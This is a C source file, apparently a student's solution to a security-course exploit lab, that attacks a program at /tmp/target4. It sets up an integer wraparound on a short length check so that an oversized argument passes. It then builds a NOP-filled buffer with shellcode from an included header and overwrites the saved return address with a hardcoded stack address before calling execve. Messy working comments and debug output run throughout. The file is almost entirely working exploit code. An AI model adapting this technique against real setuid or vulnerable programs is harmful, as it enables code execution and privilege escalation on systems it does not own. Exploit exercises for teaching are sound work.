///Sorry Chase, original file got clobbered




//TEESTING CHANGE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include "shellcode.h"


#define TARGET "/tmp/target4"


#define RET_ADDR      0xbfffeedc   //0xbffefe7c
#define BUFFER_ADDR   0xbffedf2c  //0xbffeeece
#define ARGS_ADDR     args


int main(void)
{
  char *args[3];
  char *env[1];

  args[0] = TARGET;
  //args[1] = "hi there";
  args[2] = NULL;
  env[0] = NULL;


  //min to rollover is 65536
  //plus we need space for the actual buffer
  //of size 3999
  //for a total of 69535 

  args[1] = malloc(69534);   //max rollover shows up as 0?


   //arg size is short. Wrapped around to -32768 with 32768
    //Now wrapped around to 0.

   //treat the buffer as if its a regular 4000 byte buffer
   //with an extra 8 bytes for the EBP and RET

   
//!!!!!!!!!????????????measurements from the RET (EBP+4) to the 
   ///beginning of the
   //the buffer is 4016 bytes

   //once the size issue is dealt with, this is a regular
   //buffer overflow

   //null values are not allowed in the buffer don't ask me why

   //memset(args[1], 0x90, 32789);
    //memset(args[1], 0x90, ); 
    //if over 4000 memcopy won't occur, This is 3999   

                          //however many times this array's size is.
                          //this is at the end of the buffer so
                          //when memcpy hits this it halts

    /* example

    if (arglen < maxlen)
      memcpy(buf, arg, strlen(arg)

    implemented as:


    if (-32054 < maxlen)
      memcpy(buf, arg, 4016);

    */


    //clear out the buffer of nulls
    memset(args[1],0x90, 69534);



    ///the shellcode is at a value at the beginning
    ///and before 65536 (0) relative to the buffer
    memcpy(args[1], shellcode, strlen(shellcode));


   //EBP is 4000 bytes past the beginning of the buffer
   //RET is 4004 bytes past the beginning of the buffer
   //SHELLCODE is at the beginnong of the buffer   
   //END OF STRING CHARACTER MUST EXCEED THE BUFFER COPY
   //VALUE BELOW OR IT WILL SEG FAULT
   //\0 IS SITTING AT 4016


   
   //tmpprary comment *(unsigned int*)(0xbfffdf2c + 4016) = 0xbffffdf2c;


   //*(unsigned int*)(args[1] + 4016) = args;
   //*(unsigned int*)(RET_ADDR) = BUFFER_ADDR;
   //!*(unsigned int*)(RET_ADDR) = BUFFER_ADDR;
   *(unsigned int*)(args[1] + 4016) = BUFFER_ADDR;

   args[1][69532] = '\0'; //the code will continue to peform memcpy to
			//this point

       

   //==============OUTPUT ARGS RET VALUE=============//


 //  printf("-----------------RET-----------------");
//   printf("Memory Copy of RET. value for args is:");

  int i;
	
   //for (i=100;i<4016;i++)
  // {
    // printf("%x", args[1][i]);
//x
  // }


   //IT IS ACCURATELY REPORTING RET VALUE

    printf("--------------------------------------\n");
    printf("RET: %X   ::\n", *(args[1] + 4016));
    printf("ADDRESS[1] is %X\n", args);
    printf("ADDRESS SHOULD CONTAIN RET\n");
    printf("--------------------------------------\n");

    //getchar();
 
   //==========================================

   printf("--------------------------------------\n");
   printf("Values for args.... \n");

   for (i=0;i<100;i++)
   {
      printf("%X", args[1][i]);

   }

   printf("----------------------------------------\n");

   printf("-----------ARGS IN CHARACTERS------------\n");

   for (i=0;i<300;i++)
   {
        printf("%c", args[1][i]);
   }

 
   printf("\n");
   printf("==============SHELLCODE===============\n");
   printf(shellcode);
   printf("\n");

  //

   printf("\nReturn Address\n");
   printf("%X", 0xbfffea8c);

  //printf("MYSHORT %d", myshort);

  //

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  printf("Error number %d", errno);


  return 0;
}
